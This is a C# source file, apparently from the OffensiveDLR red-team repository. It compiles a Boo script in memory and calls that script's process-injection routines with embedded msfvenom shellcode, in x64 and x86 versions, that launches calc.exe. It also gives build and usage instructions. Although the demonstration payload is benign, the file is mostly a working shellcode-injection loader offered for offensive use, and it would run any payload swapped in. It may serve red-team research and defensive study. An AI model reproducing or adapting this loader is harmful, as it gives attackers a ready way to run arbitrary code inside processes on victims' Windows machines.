mirror of
https://github.com/byt3bl33d3r/OffensiveDLR
synced 2026-06-06 15:24:29 +00:00
114 lines
5.7 KiB
C#
Executable File
114 lines
5.7 KiB
C#
Executable File
using System;
|
|
using System.Text;
|
|
using System.Reflection;
|
|
|
|
using Boo.Lang.Compiler;
|
|
using Boo.Lang.Compiler.IO;
|
|
using Boo.Lang.Compiler.Pipelines;
|
|
|
|
/*
|
|
Author: Marcello Salvati (@byt3bl33d3r)
|
|
License: BSD 3-Clause
|
|
|
|
1) Download the latest stable version of Boolang https://github.com/boo-lang/boo/releases
|
|
|
|
2) In the directory with the Boolang DLLs compile with:
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:Boo.Lang.Compiler.dll,Boo.Lang.dll,Boo.Lang.Parser.dll /t:exe runBoo.cs
|
|
|
|
3) Usage: runBoo.exe shellcode.boo <InjectionMethod> <x86|x64>
|
|
Example: runBoo.exe shellcode.boo InjectRemote
|
|
|
|
See shellcode.boo for the injection methods available
|
|
|
|
This PoC won't work without the Boolang DLLs and shellcode.boo file in the same directory but you can easily fix that with a little C# trickery :)
|
|
|
|
References:
|
|
- https://github.com/boo-lang/boo/wiki/Scripting-with-the-Boo.Lang.Compiler-API
|
|
- https://github.com/boo-lang/boo/wiki/Invoke-Native-Methods-with-DllImport
|
|
- https://github.com/pwndizzle/c-sharp-memory-injection
|
|
*/
|
|
|
|
namespace ConsoleApplication1
|
|
{
|
|
class Program
|
|
{
|
|
public static void Main(string[] args)
|
|
{
|
|
|
|
// msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp
|
|
byte[] sc64 = new byte[276] {
|
|
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
|
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
|
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
|
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
|
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
|
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
|
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
|
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
|
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
|
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
|
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
|
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
|
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
|
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
|
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
|
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
|
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
|
|
0x63,0x2e,0x65,0x78,0x65,0x00 };
|
|
|
|
// msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f csharp
|
|
byte[] sc86 = new byte[193] {
|
|
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
|
|
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
|
|
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
|
|
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
|
|
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
|
|
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
|
|
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
|
|
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
|
|
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
|
|
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
|
|
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
|
|
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
|
|
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
|
|
|
|
BooCompiler compiler = new BooCompiler();
|
|
//compiler.Parameters.Input.Add(new StringInput("MyScript", "print 'Doot Doot'!")); :)
|
|
compiler.Parameters.Input.Add(new FileInput(args[0]));
|
|
compiler.Parameters.Pipeline = new CompileToMemory();
|
|
compiler.Parameters.Ducky = true;
|
|
|
|
CompilerContext context = compiler.Run();
|
|
//Note that the following code might throw an error if the Boo script had bugs.
|
|
//Poke context.Errors to make sure.
|
|
if (context.GeneratedAssembly != null)
|
|
{
|
|
Type scriptModule = context.GeneratedAssembly.GetType("Inject");
|
|
MethodInfo injectMain = scriptModule.GetMethod(args[1]);
|
|
|
|
if (args.Length == 3)
|
|
{
|
|
if (args[2] == "x86")
|
|
{
|
|
Console.WriteLine("Using x86 Shellcode");
|
|
string output = (string)injectMain.Invoke(null, new object[] {sc86} );
|
|
}
|
|
}
|
|
else
|
|
{
|
|
Console.WriteLine("Using x64 Shellcode");
|
|
string output = (string)injectMain.Invoke(null, new object[] {sc64} );
|
|
Console.WriteLine(output);
|
|
}
|
|
}
|
|
else
|
|
{
|
|
foreach (CompilerError error in context.Errors)
|
|
Console.WriteLine(error);
|
|
}
|
|
|
|
Console.WriteLine("Boo!");
|
|
}
|
|
}
|
|
} |